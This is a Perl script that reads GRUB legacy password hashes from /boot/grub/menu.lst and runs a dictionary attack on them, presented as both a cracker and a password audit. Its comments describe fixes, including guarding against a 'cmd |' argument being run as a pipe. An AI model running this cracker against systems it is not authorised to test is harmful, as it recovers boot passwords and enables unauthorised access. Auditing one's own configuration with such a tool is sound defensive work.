This is a GRUB bootloader password cracker. It finds the MD5 hashes in /boot/grub/menu.lst and, when given a dictionary list, tests each word in it against those hashes (needs the Crypt::PasswdMD5 Perl module).
ac5ffebfa346a0c505b2b33450e4b194
#!/usr/bin/perl
use Crypt::PasswdMD5;
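use strict;
use warnings;

# Password audit for a GRUB (legacy) menu.lst: collect every
# "password --md5" hash, then test each word of the dictionary file named
# in $ARGV[0] against those hashes with unix_md5_crypt().
#
# A hash that matches a dictionary word means the GRUB password should be
# replaced; menu.lst itself should be readable by root only, since anyone
# who can read it can run the same check.

my $menu_path = '/boot/grub/menu.lst';

# Three-argument open with a lexical handle: the path can never be parsed
# as an open mode or a pipe.
open(my $menu_fh, '<', $menu_path)
    or die "Problem opening /boot/grub/menu.lst !\n";

my @entries;          # one { hash => ..., title => ... } per password line
my $current_title;    # latest "title" seen; undef in the global section
my $title_line = 0;   # input line number of that title

while (my $row = <$menu_fh>) {
    if ($row =~ /^title\s+(.+)/) {
        $current_title = $1;
        $title_line    = $.;
    }
    if ($row =~ /^password --md5 (\S+)/) {
        my $hash = $1;

        # Remember which entry the hash belongs to at parse time. The
        # original indexed titles by hash number plus one, which labels
        # results with the wrong entry whenever the two counts diverge.
        my $label = defined $current_title
            ? $current_title
            : '(global password)';
        push @entries, { hash => $hash, title => $label };

        # As before, the listing line is printed only for a password
        # directive that sits directly under its title.
        if (defined $current_title && $title_line + 1 == $.) {
            print "MD5crypt hash for $label: $hash\n";
        }
    }
}
close($menu_fh);

if (!@entries) {
    print "GRUB is not using password authentication!";
}
print "\n";

# Nothing to test: no dictionary is needed and none is opened.
exit 0 if !@entries;

my $dict_path = $ARGV[0];
if (!defined $dict_path || $dict_path eq '') {
    print "No dictionary file given; hashes were listed but not tested.\n";
    exit 0;
}

# The original used two-argument open on "$ARGV[0]" without checking the
# result. A command-line value such as "cmd |" would then be executed as a
# pipe, and a missing file silently produced "no match" for every hash.
open(my $dict_fh, '<', $dict_path)
    or die "Problem opening dictionary $dict_path: $!\n";

print "Using dictionary $dict_path to crack GRUB passwords...\n\n";

for my $entry (@entries) {
    my ($hash, $label) = @{$entry}{qw(hash title)};

    # MD5-crypt hashes have the form $1$<salt>$<digest> with a salt of up
    # to 8 characters. The original pattern accepted exactly 5, so any
    # other salt length left $salt unset and the hash was reported as
    # "not found" without really being tested -- false assurance in an
    # audit. The salt is constant per hash, so extract it once here.
    my ($salt) = $hash =~ /\A\$1\$([^\$]{1,8})\$/;
    if (!defined $salt) {
        warn "Skipping unrecognised hash format for $label: $hash\n";
        next;
    }

    # Re-read the dictionary from the start for every hash.
    seek($dict_fh, 0, 0)
        or die "Cannot rewind dictionary $dict_path: $!\n";

    while (my $candidate = <$dict_fh>) {
        chomp $candidate;
        if (unix_md5_crypt($candidate, $salt) eq $hash) {
            print "Password for $label: $candidate \nMD5hash for $label: $hash\n";
            last;
        }
    }
}
close($dict_fh);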